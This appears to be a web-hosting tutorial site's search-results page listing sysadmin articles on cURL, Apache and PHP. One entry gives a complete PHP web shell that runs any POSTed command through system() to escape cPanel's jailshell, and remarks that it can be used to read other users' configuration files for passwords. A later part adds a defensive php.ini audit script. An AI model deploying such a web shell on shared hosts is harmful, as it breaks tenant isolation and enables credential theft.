
Search Results for: No Limit

How to automatically follow HTTP redirect in cURL

November 28, 2023

Redirect is a common HTTP response that instructs the client to look at a different URL. This is often used when the content has moved or the URL structure …

How to save cURL output to file

November 28, 2023

cURL, a powerful command-line tool for making HTTP requests, is often used by developers and system administrators for fetching content from the web, simulating user interactions, and even debugging …

How to increase PHP maximum execution time in cPanel

November 28, 2023

PHP scripts by default are allowed to be executed for no longer than 30 seconds. The option is defined in the max_execution_time directive, and your PHP script will exit …

How to bypass cPanel Jailshell using PHP

November 28, 2023

Users registering for shared Linux web hosting accounts are normally not provided with shell access. Even if they are, what they can do with the shell is limited, as they are confined to a jailed environment, thanks to cPanel’s jailshell. Displaying the SHELL variable at the command prompt verifies this:

$ echo $SHELL
/usr/local/cpanel/bin/jailshell

To briefly show what it means, listing out home directories using the following Linux command reveals that the user is alone in the shell.

$ ls /home/ | wc -l
1

With some simple HTML and PHP, a web-based shell can offer something more to the users. The following code can be made available through http://www.anyserver.com/jailshell.php:

<html>
  <body>
    <p>Enter command:
      <form action="jailshell.php" method=post>
      <input type=text name=command>
      <input type=submit name=submit>
      </form>
    </p>
    <pre>
      <?php system ($_POST['command']); ?>
    </pre>
  </body>
</html>

and executing some simple commands as the following shows what it’s capable of.

People with malicious intent can use this method to search other users’ home directories and grep through their web applications’ configuration files to steal passwords and other juicy information.

Most hosting providers already disable system() and other similar functions in their PHP implementation.
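
To confirm that a given host really does this, the following sketch reports which command-execution functions a php.ini still leaves enabled. It is an added example, not part of the original article; the function list in EXEC_FUNCS, the helper names and the sample php.ini are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a php.ini for command-execution functions that are
# NOT listed in disable_functions. The list below is an assumption (the
# article only names system()); extend it to match local policy.
EXEC_FUNCS="system exec shell_exec passthru popen proc_open pcntl_exec"

# Print the disable_functions value from the file given as $1.
# Lines commented out with ';' are ignored; if the directive appears more
# than once, the last assignment is taken as the effective one.
get_disabled() {
    sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$1" \
        | sed 's/[[:space:]]*;.*$//' \
        | tail -n 1 | tr -d "\"'"
}

# Print, space-separated, every function in EXEC_FUNCS that is still enabled.
missing_funcs() {
    # Wrap the list in commas so that "exec" cannot match inside "shell_exec".
    disabled=",$(get_disabled "$1" | tr -d '[:space:]'),"
    out=""
    for f in $EXEC_FUNCS; do
        case "$disabled" in
            *",$f,"*) ;;               # listed, therefore disabled
            *) out="$out $f" ;;        # not listed, therefore callable
        esac
    done
    echo "${out# }"
}

# Constructed sample php.ini (not taken from any real host).
sample=$(mktemp)
cat > "$sample" <<'EOF'
; disable_functions = system
disable_functions = "system, exec ,passthru"
EOF
echo "still enabled: $(missing_funcs "$sample")"
rm -f "$sample"
```

Run it against the php.ini that each PHP version on the host actually loads; an empty result means every function in the list is disabled.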

How to manage the Apache web server service

November 28, 2023

The Apache service can be controlled using its provided binaries. Various distributions may refer to this binary by different names. For example, Ubuntu names it as apache2, while Red …

How to disable HTTP methods in Apache

November 28, 2023

HTTP methods or verbs, such as GET, POST, PUT, DELETE, and others, define the type of action to be performed on a resource. While some of these methods are …

How to prevent hotlinking in Apache

November 28, 2023

Hotlinking, often referred to as bandwidth theft, happens when other websites directly link to images or other media files hosted on your server. This can lead to increased server …

Understanding Apache web server configuration files

November 28, 2023

Apache webserver reads its configuration files every time it's started. The configuration files are in plain text format, and Apache will need to restart every time there are changes …

How to load-test web server using ApacheBench (ab)

November 28, 2023

Load testing a web server is crucial for assessing how the server behaves under a particular load, especially before deploying it in a live environment. ApacheBench, commonly known as …
